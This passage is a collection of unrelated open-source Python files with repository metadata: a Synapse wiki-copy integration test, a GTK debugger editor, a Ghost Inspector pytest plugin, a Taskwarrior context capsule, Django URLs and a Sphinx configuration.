sub_subwiki = Wiki(owner=self.project_entity, title='A sub-sub-wiki', markdown=second_md,
parentWikiId=self.subwiki.id, attachments=[attachname])
self.sub_subwiki = self.syn.store(sub_subwiki)
# Set up the second project
self.second_project = self.syn.store(Project(name=str(uuid.uuid4())))
self.schedule_for_cleanup(self.second_project.id)
self.fileMapping = {'syn123': 'syn12345', 'syn456': 'syn45678'}
self.first_headers = self.syn.getWikiHeaders(self.project_entity)
def test_copy_Wiki(self):
second_headers = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entityMap=self.fileMapping)
mapping = dict()
# Check that all wikis were copied correctly with the correct mapping
for index, info in enumerate(second_headers):
mapping[self.first_headers[index]['id']] = info['id']
assert self.first_headers[index]['title'] == info['title']
if info.get('parentId', None) is not None:
# Check if parent Ids are mapping correctly in the copied Wikis
assert info['parentId'] == mapping[self.first_headers[index]['parentId']]
# Check that all wikis have the correct attachments and have correct internal synapse link/file mapping
for index, info in enumerate(second_headers):
# Check if markdown is the correctly mapped
orig_wikiPage = self.syn.getWiki(self.project_entity, self.first_headers[index]['id'])
new_wikiPage = self.syn.getWiki(self.second_project, info['id'])
s = orig_wikiPage.markdown
for oldWikiId in mapping.keys():
oldProjectAndWikiId = "%s/wiki/%s" % (self.project_entity.id, oldWikiId)
newProjectAndWikiId = "%s/wiki/%s" % (self.second_project.id, mapping[oldWikiId])
s = re.sub(oldProjectAndWikiId, newProjectAndWikiId, s)
for oldFileId in self.fileMapping.keys():
s = re.sub(oldFileId, self.fileMapping[oldFileId], s)
assert s == new_wikiPage.markdown
orig_attach = self.syn.getWikiAttachments(orig_wikiPage)
new_attach = self.syn.getWikiAttachments(new_wikiPage)
orig_file = [i['fileName'] for i in orig_attach
if not i['isPreview']]
new_file = [i['fileName'] for i in new_attach
if not i['isPreview']]
# check that attachment file names are the same
assert orig_file == new_file
def test_entitySubPageId_and_destinationSubPageId(self):
# Test: entitySubPageId
second_header = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entitySubPageId=self.sub_subwiki.id, destinationSubPageId=None,
updateLinks=False, updateSynIds=False, entityMap=None)
test_ent_subpage = self.syn.getWiki(self.second_project.id, second_header[0]['id'])
# Test: No internal links updated
assert test_ent_subpage.markdown == self.sub_subwiki.markdown
assert test_ent_subpage.title == self.sub_subwiki.title
# Test: destinationSubPageId
third_header = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entitySubPageId=self.subwiki.id,
destinationSubPageId=test_ent_subpage.id, updateLinks=False,
updateSynIds=False, entityMap=None)
temp = self.syn.getWiki(self.second_project.id, third_header[0]['id'])
        # Known issue: some title pages come back blank; this still needs to be addressed
assert temp.title == self.subwiki.title
assert temp.markdown == self.subwiki.markdown
temp = self.syn.getWiki(self.second_project.id, third_header[1]['id'])
assert temp.title == self.sub_subwiki.title
assert temp.markdown == self.sub_subwiki.markdown
class TestCopyFileHandles:
@pytest.fixture(autouse=True)
def init(self, syn, schedule_for_cleanup):
self.syn = syn
# create external file handles for https://www.synapse.org/images/logo.svg,
project = Project(str(uuid.uuid4()))
project = self.syn.store(project)
schedule_for_cleanup(project)
# create file entity from externalFileHandle
external_file_handle_request_1 = {
"concreteType": "org.sagebionetworks.repo.model.file.ExternalFileHandle",
"externalURL": "https://www.synapse.org/images/logo.svg",
"fileName": "testExternalFileHandle"
}
external_response_1 = self.syn.restPOST('/externalFileHandle', body=json.dumps(external_file_handle_request_1),
endpoint=self.syn.fileHandleEndpoint)
self.file_handle_id_1 = external_response_1['id']
test_entity_1 = File(parent=project)
test_entity_1.dataFileHandleId = self.file_handle_id_1
test_entity_1 = self.syn.store(test_entity_1)
self.obj_id_1 = str(test_entity_1['id'][3:])
def test_copy_file_handles(self):
# define inputs
file_handles = [self.file_handle_id_1]
associate_object_types = ["FileEntity"]
associate_object_ids = [self.obj_id_1]
copy_results = synapseutils.copyFileHandles(
self.syn, file_handles, associate_object_types, associate_object_ids
)
# assert copy result contains one copy result
assert len(copy_results) == 1
| {
"content_hash": "a19b453963a4b916d416e0e65bd16e7b",
"timestamp": "",
"source": "github",
"line_count": 346,
"max_line_length": 120,
"avg_line_length": 46.19364161849711,
"alnum_prop": 0.6414940874679347,
"repo_name": "thomasyu888/synapsePythonClient",
"id": "91e32778638bccf4ea34ebf4a485360db90699cc",
"size": "15983",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/integration/synapseutils/test_synapseutils_copy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "420"
},
{
"name": "Python",
"bytes": "1573386"
}
],
"symlink_target": ""
} |
import gtk
import gobject
import os.path
import debugger
from util import *
from editor_base import *
from source_view_tab import SourceViewTab
class SourceViewFileNotFoundTab(gtk.VBox):
def __init__(self,file_handle):
EditorTabInterface.validate_implementation(self)
    gtk.VBox.__init__(self)
    l = gtk.Label("File not found: %s" % file_handle)
self._file_handle = file_handle
self.pack_start(l,True,True,0)
self.show_all()
@property
def file_handle(self):
return self._file_handle
class SourceViewEditor(EditorBase):
def __init__(self,mc):
EditorBase.__init__(self, mc)
self._notebook = gtk.Notebook()
self._notebook.set_tab_pos(gtk.POS_TOP)
self._tabs_with_files_that_exist = {}
# control 1 thru 9 modifiers
self.overlay.add_keyboard_action('source_view_editor.focus_tab_1', lambda: self._focus_nth_tab(0))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_2', lambda: self._focus_nth_tab(1))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_3', lambda: self._focus_nth_tab(2))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_4', lambda: self._focus_nth_tab(3))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_5', lambda: self._focus_nth_tab(4))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_6', lambda: self._focus_nth_tab(5))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_7', lambda: self._focus_nth_tab(6))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_8', lambda: self._focus_nth_tab(7))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_9', lambda: self._focus_nth_tab(self._notebook.get_n_pages() - 1))
self._notebook.connect('page-added', self._on_page_added)
self._notebook.connect('page-removed', self._on_page_removed)
@property
def widget(self):
return self._notebook
# EditorBase methods
############################################################################
def focus_file(self, file_handle, line_no = -1):
if file_handle.exists:
if not self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
v = SourceViewTab(self, file_handle)
bn = file_handle.basename
v.show_all()
self._notebook.append_page(v,gtk.Label(bn))
if not self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
# only happens on shutdown...
return
v = self._tabs_with_files_that_exist[file_handle.absolute_name]
assert v
self._focus_tab(v)
if line_no != -1:
v.focus_line(line_no)
else:
# TODO show the file not found tab...
pass
def get_current_location(self):
tab_num = self._notebook.get_current_page()
tab = self._notebook.get_nth_page(tab_num)
fh = tab.file_handle
line_num = tab.get_current_line()
return fh.make_location(line_num)
def set_line_mark_states(self, file_handle, added, changed, removed):
if not file_handle.exists:
return
if self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
self._tabs_with_files_that_exist[file_handle.absolute_name].set_line_mark_states(added, changed, removed)
# implementation
###########################################################################
def grab_focus(self):
if self._notebook.get_n_pages():
n = self._notebook.get_current_page()
self._notebook.get_nth_page(n).grab_focus()
def _on_page_added(self, nb, child, page_num):
fh = child.file_handle
if fh.exists:
self._tabs_with_files_that_exist[fh.absolute_name] = child
def _on_page_removed(self, nb, child, page_num):
fh = child.file_handle
if fh.exists:
assert self._tabs_with_files_that_exist.has_key(fh.absolute_name)
del self._tabs_with_files_that_exist[fh.absolute_name]
def _focus_nth_tab(self,num):
print "Focusing %i" % num
if num >= self._notebook.get_n_pages():
return
self._notebook.set_current_page(num)
self._notebook.get_nth_page(num).grab_focus()
def _focus_tab(self,tab):
for i in range(self._notebook.get_n_pages()):
page = self._notebook.get_nth_page(i)
if page == tab:
self._notebook.set_current_page(i)
return
raise Exception("Tab not found: %s")
| {
"content_hash": "c6284b49b814f9f1b84c88fda40074d8",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 133,
"avg_line_length": 37,
"alnum_prop": 0.6495726495726496,
"repo_name": "natduca/ndbg",
"id": "ba5af1b4da2357d05ba1646fe2cff462bfba23ac",
"size": "5009",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ui/source_view_editor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "4728"
},
{
"name": "C++",
"bytes": "5787"
},
{
"name": "Emacs Lisp",
"bytes": "5014"
},
{
"name": "JavaScript",
"bytes": "237"
},
{
"name": "Python",
"bytes": "554374"
},
{
"name": "Shell",
"bytes": "781"
},
{
"name": "VimL",
"bytes": "1848"
}
],
"symlink_target": ""
} |
import yaml
import pytest
import shutil
import requests
import tempfile
from os import getenv as env
from contextlib import contextmanager
API_URL = env('GI_API_URL', 'https://api.ghostinspector.com/v1/')
API_KEY = env('GI_API_KEY')
START_URL = env('GI_START_URL')
# Command-line Options
def pytest_addoption(parser):
group = parser.getgroup('ghostinspector')
group.addoption(
'--gi_key',
action='store',
dest='gi_key',
default=API_KEY,
help='Set the value for the Ghost Inspector API key'
)
group.addoption(
'--gi_start_url',
action='store',
dest='gi_start_url',
default=START_URL,
help='Override the starting url value for the Ghost Inspector tests'
)
group.addoption(
'--gi_suite',
action='append',
dest='gi_suite',
default=[],
help='Id of a Ghost Inspector suite to execute'
)
group.addoption(
'--gi_test',
action='append',
dest='gi_test',
default=[],
help='Id of a Ghost Inspector test to execute'
)
group.addoption(
'--gi_param',
action='append',
dest='gi_param',
default=[],
help=(
'Querystring param (repeatable) to include '
'in the API execute request. Example: "--gi_param foo=bar"'
)
)
group.addoption(
'--gi_collect_mode',
action='store',
dest='gi_collect_mode',
type=str,
choices=['files', 'ids', 'all'],
        help=('specify "files", "ids" or "all" to control how the plugin '
'manages test collection')
)
def pytest_configure(config):
# only do logic if mode is not explicitly set
if config.option.gi_collect_mode is None:
if config.option.gi_test or config.option.gi_suite:
# this will disable file/directory test discovery
config.option.gi_collect_mode = "ids"
@pytest.hookimpl(hookwrapper=True)
def pytest_collection(session):
"""
Allow execution of suites/tests specified via cmdline opts. Creates temp
yaml files for the discover/collection process.
"""
@contextmanager
def _make_tmp_dir():
tmpdir = tempfile.mkdtemp()
yield tmpdir
shutil.rmtree(tmpdir)
def _make_tmp_yaml(tmpdir, data):
tf = tempfile.NamedTemporaryFile('wt',
prefix='gi_test_',
suffix='.yml',
dir=tmpdir,
delete=False)
yaml.safe_dump(data, tf)
tf.close()
return tf.name
if not session.config.option.gi_suite \
and not session.config.option.gi_test:
yield
elif session.config.option.gi_collect_mode == "files":
yield
else:
with _make_tmp_dir() as tmpdir:
tmp_files = []
for id in session.config.option.gi_suite:
test_yaml = {'suites': [{'id': id}]}
tmp_files.append(_make_tmp_yaml(tmpdir, test_yaml))
for id in session.config.option.gi_test:
test_yaml = {'tests': [{'id': id}]}
tmp_files.append(_make_tmp_yaml(tmpdir, test_yaml))
session.config.args += tmp_files
yield
def pytest_collect_file(path, parent):
"""Collection hook for ghost inspector tests
This looks for yaml files containing configuration info for executing
http://ghostinspector.com tests via the API
"""
if path.basename.startswith('gi_test_') and path.ext == '.yml':
if parent.config.option.gi_key is None:
raise pytest.UsageError("Missing --gi_key option")
return GIYamlCollector(path, parent=parent)
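# Illustrative example of a collected config file (the ids are placeholders);
# the GIYamlCollector below reads optional "suites" and "tests" lists of id entries:
#
#   # gi_test_smoke.yml
#   suites:
#     - id: <ghost-inspector-suite-id>
#   tests:
#     - id: <ghost-inspector-test-id>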
def pytest_ignore_collect(path, config):
"""
    Disable file/directory collection when --gi_test/--gi_suite options are
provided
"""
if config.option.gi_collect_mode == "ids":
return True
class GIAPIMixin(object):
def _api_request(self, url, params=None):
if params is None:
params = {}
params['apiKey'] = self.gi_key
if self.config.option.gi_start_url is not None:
params['startUrl'] = self.config.option.gi_start_url
try:
resp = requests.get(url, params=params)
resp.raise_for_status()
resp_data = resp.json()
if 'errorType' in resp_data:
raise self.CollectError(
"Ghost Inspector API returned error: %s" %
resp_data['message'])
return resp_data['data']
except Exception as e:
raise self.CollectError(str(e))
class GIYamlCollector(pytest.File, GIAPIMixin):
"""Collect and generate pytest test items based on yaml config"""
def __init__(self, *args, **kwargs):
super(GIYamlCollector, self).__init__(*args, **kwargs)
self.gi_key = self.config.option.gi_key
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for suite in raw.get('suites', []):
for test_item in self._collect_suite(suite):
yield test_item
for test in raw.get('tests', []):
yield self._collect_test(test)
def _collect_suite(self, suite):
url = API_URL + ('suites/%s/tests/' % suite['id'])
test_list = self._api_request(url)
for test_config in test_list:
yield self._create_test_item(test_config)
def _collect_test(self, test):
url = API_URL + ('tests/%s/' % test['id'])
test_config = self._api_request(url)
return self._create_test_item(test_config)
def _create_test_item(self, test_config):
params = dict(x.split('=') for x in self.config.option.gi_param)
spec = {
'id': test_config['_id'],
'suite': test_config['suite']['name'],
'params': params
}
return GITestItem(test_config['name'], self, spec)
class GITestItem(pytest.Item, GIAPIMixin):
def __init__(self, name, parent, spec):
super(GITestItem, self).__init__(name, parent)
self.gi_key = self.config.option.gi_key
self.spec = spec
def runtest(self):
url = API_URL + ('tests/%s/execute/' % self.spec['id'])
result = self._api_request(url, self.spec['params'])
if not result['passing']:
raise GIException(self, result)
def repr_failure(self, excinfo):
""" format failure info from GI API response """
if isinstance(excinfo.value, GIException):
resp_data = excinfo.value.args[1]
failing_step = next(
step for step in resp_data['steps'] if not step['passing']
)
if 'error' in resp_data:
error_msg = resp_data['error']['details']
else:
error_msg = ''
result_url_base = 'https://app.ghostinspector.com/results'
return "\n".join([
"Ghost Inspector test failed",
" name: %s" % resp_data['test']['name'],
" start url: %s" % resp_data['startUrl'],
" end url: %s" % resp_data['endUrl'],
" result url: %s/%s" % (result_url_base, resp_data['_id']),
" sequence: %d" % failing_step['sequence'],
" target: %s" % failing_step['target'],
" command: %s" % failing_step['command'],
" value: %s" % failing_step['value'],
" error: %s" % error_msg,
" step error: %s" % failing_step.get('error', '')
])
def reportinfo(self):
return self.fspath, 0, "%s :: %s" % (self.spec['suite'], self.name)
class GIException(Exception):
""" custom failure reporting """
| {
"content_hash": "18c8d0a343f2294c740b2adce67b730f",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 77,
"avg_line_length": 32.40573770491803,
"alnum_prop": 0.5512836726950803,
"repo_name": "harvard-dce/pytest-ghostinspector",
"id": "c1766ce130dce176c02688d24f56b007f797d0d5",
"size": "7932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pytest_gi/plugin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13288"
}
],
"symlink_target": ""
} |
"""Fichier contenant la fonction reussir_recette."""
from primaires.format.fonctions import supprimer_accents
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
"""Fait progresser un membre de guilde dans son rang."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.reussir_recette, "Personnage", "str", "str")
@staticmethod
def reussir_recette(personnage, cle_guilde, cle_recette):
"""Fait progresser le personnage dans le rang de la guilde.
La recette est la clé du prototype d'objet d'une recette de
rang. En fonction du nombre nécessaire, le personnage progresse
dans le rang. Si par exemple il doit faire 3 epee_courte,
il progressera les trois premières fois. Après, il ne
progressera plus dans le rang (il aura fait cet objet 3 fois).
Cette action est donc à mettre dans le cas où le personnage
réussit l'objet de rang.
Si la guilde n'est pas trouvée, crée une alerte. En revanche,
si la recette n'est pas trouvée dans le rang, ne lève aucune
alerte et ne fait rien (passe à la ligne suivante du script).
Cette fonction retourne vrai si le personnage a bel et bien
progressé dans son rang, faux sinon. Cela permet de faire
différentes actions en fonction de la progression du
personnage.
Paramètres à préciser :
* personnage : le personnage membre de la guilde
* cle_guilde : la clé de guilde (une chaîne)
* cle_recette : la clé de la recette (une chaîne)
Exemple d'utilisation :
si reussir_recette personnage "forgerons" "epee_courte":
# Le personnage a réussit et progressé
sinon:
# Le personnage a réussit mais n'a pas progressé
"""
cle_guilde = cle_guilde.lower()
if cle_guilde not in importeur.crafting.guildes:
raise ErreurExecution("La guilde {} n'existe pas".format(
repr(cle_guilde)))
guilde = importeur.crafting.guildes[cle_guilde]
if personnage not in guilde.membres:
return False
progression = guilde.membres[personnage]
try:
return progression.reussir_recette(cle_recette.lower())
except ValueError:
return False
| {
"content_hash": "236ca4f68fbc5c9db48adebb9c4fb3fd",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 74,
"avg_line_length": 37.8125,
"alnum_prop": 0.6603305785123967,
"repo_name": "vlegoff/tsunami",
"id": "b7a001b1ca2d5b5bbbcdafc637f01bbc81b1d577",
"size": "4012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/crafting/fonctions/reussir_recette.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
urlpatterns = patterns('apps.basic_pages.views',
#url(r'^home/$', 'view_homepage', name="view_homepage"),
url(r'^support/$', 'view_support_page', name="view_support_page"),
url(r'^best-practices/$', 'view_best_practices_page', name="view_best_practices_page"),
#url(r'^/?$', 'view_homepage', name="default_homepage"),
url(r'^/?$', 'view_homepage', name="view_homepage"),
)
| {
"content_hash": "65d1422fef33a90292c30ebcfd1cc097",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 91,
"avg_line_length": 28.3125,
"alnum_prop": 0.6423841059602649,
"repo_name": "bencomp/dataverse.org",
"id": "b6de6975b78d75ecfdb21cc5b77c1a29885f97db",
"size": "453",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dataverse_org/apps/basic_pages/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8915"
},
{
"name": "JavaScript",
"bytes": "818906"
},
{
"name": "Perl",
"bytes": "13686"
},
{
"name": "Python",
"bytes": "140061"
},
{
"name": "Shell",
"bytes": "21004"
}
],
"symlink_target": ""
} |
"""
Package declaration for content assertions test helper module
"""
import core
| {
"content_hash": "306e1611848df9f04cbfa6a6e17eda83",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 61,
"avg_line_length": 20.5,
"alnum_prop": 0.7804878048780488,
"repo_name": "bmedx/modulestore",
"id": "fc6a0c4d9bf0af7946a7ce8fb0231b9eac561c8d",
"size": "82",
"binary": false,
"copies": "94",
"ref": "refs/heads/master",
"path": "xmodule/tests/rendering/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "8102"
},
{
"name": "Makefile",
"bytes": "3554"
},
{
"name": "Python",
"bytes": "1355902"
},
{
"name": "Shell",
"bytes": "132"
}
],
"symlink_target": ""
} |
from taskwarrior_capsules.capsule import CommandCapsule
from taskwarrior_capsules.exceptions import CapsuleError
from taskwarrior_capsules.data import BUILT_IN_COMMANDS
class Context(CommandCapsule):
""" Backports 'context' command Taskwarrior 2.4.2."""
MIN_VERSION = '0.2.5'
MAX_VERSION = '1.0'
MIN_TASKWARRIOR_VERSION = '2.3'
MAX_TASKWARRIOR_VERSION = '2.4.1.99999'
def handle(self, filter_args, extra_args, **kwargs):
try:
first_arg = extra_args[0].lower()
except IndexError:
raise CapsuleError("No context command specified")
if first_arg == 'none':
self.clear_context(extra_args[1:])
elif first_arg == 'delete':
self.delete_context(extra_args[1:])
elif first_arg == 'list':
self.list_contexts(extra_args[1:])
elif first_arg == 'show':
self.show_context(extra_args[1:])
elif first_arg == 'define':
self.define_context(extra_args[1:])
else:
self.set_context(extra_args)
self.configuration.write()
def preprocess(self, filter_args, extra_args, command_name=None, **kwargs):
try:
context = self.configuration['current_context']
is_report = command_name not in BUILT_IN_COMMANDS
if is_report and context:
context_filters = self._get_contexts()[context]
filter_args.append('(%s)' % context_filters)
except KeyError:
pass
return filter_args, extra_args, command_name
# Utility methods
def clear_context(self, args):
self.configuration['current_context'] = ''
def delete_context(self, args):
ctx = self._get_contexts()
context_name = self._collapse(args)
if context_name in ctx:
del ctx[context_name]
else:
raise CapsuleError(
"Context '%s' does not exist" % context_name
)
def list_contexts(self, args):
ctx = self._get_contexts()
for context_name, context in ctx.items():
print '%s\t%s' % (context_name, context)
def show_context(self, args):
print self.configuration.get('current_context', '')
def define_context(self, args):
context_name = args[0]
spec = self._collapse(args[1:])
contexts = self._get_contexts()
contexts[context_name] = spec
self._set_contexts(contexts)
def set_context(self, args):
context_name = self._collapse(args)
if context_name in self._get_contexts():
self.configuration['current_context'] = context_name
else:
raise CapsuleError(
"Context '%s' does not exist" % context_name
)
def _get_contexts(self):
if 'contexts' not in self.configuration:
self.configuration['contexts'] = {}
return self.configuration['contexts']
def _set_contexts(self, ctx):
self.configuration['contexts'] = ctx
def _collapse(self, args):
return ' '.join(args)
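# Usage sketch (illustrative; the context name and filter spec are assumptions).
# These are the subcommands dispatched by handle() above, however the capsule
# command is invoked through the taskwarrior-capsules wrapper:
#   context define work project:Work   -> store the filter spec under "work"
#   context work                       -> activate it (appended to report filters in preprocess())
#   context show                       -> print the active context name
#   context list                       -> list all defined contexts
#   context none                       -> clear the active context
#   context delete work                -> remove the definition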
| {
"content_hash": "f604819d96b79fcd3ea86cc50356f8dd",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 79,
"avg_line_length": 32.694736842105264,
"alnum_prop": 0.5872504829362524,
"repo_name": "coddingtonbear/taskwarrior-context-capsule",
"id": "6f0c1e9ac55f04c1e4b3d2b5afb4b635562c3cc4",
"size": "3106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "taskwarrior_context_capsule/capsule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5068"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'connect-sdk-python2'
copyright = u'Copyright (c) 2016 Global Collect Services B.V.'
author = u'Ingenico ePayments'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'3.33.0'
# The full version, including alpha/beta/rc tags.
release = u'3.33.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = u'Python SDK v3.33.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'connect-sdk-python2doc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'connect-sdk-python2.tex', u'connect-sdk-python2 Documentation',
author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, will not define \strong, \code, \titleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'connect-sdk-python2', u'connect-sdk-python2 Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# texinfo_documents = [
# (master_doc, 'test', u'Python SDK Documentation',
# author, 'test',
# 'SDK to communicate with the Ingenico ePayments platform using the Ingenico Connect Server API',
# 'Miscellaneous'),
# ]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
def filter_members(app, what, name, obj, skip, options):
# include __init__ and __str__ methods that are documented
if name in ('__init__', '__str__') and not skip:
return not bool(obj.__doc__)
# exclude nested classes
if what == 'class' and str(obj)[:7] == '<class ':
return True
# special case
if what == 'module' and name == 'IterProperty':
return True
return skip
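# Net effect of the hook above: __init__ and __str__ are documented only when
# they carry a docstring, nested classes are always excluded, and the module
# member named IterProperty is hidden; everything else keeps autodoc's default.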
def setup(app):
app.connect('autodoc-skip-member', filter_members)
| {
"content_hash": "94da4c32d276f8229bd32cd38cd87433",
"timestamp": "",
"source": "github",
"line_count": 342,
"max_line_length": 103,
"avg_line_length": 28.719298245614034,
"alnum_prop": 0.6842801873345551,
"repo_name": "Ingenico-ePayments/connect-sdk-python2",
"id": "9e994ace69290d47c7b65b0004fdf54814904808",
"size": "10479",
"binary": false,
"copies": "1",
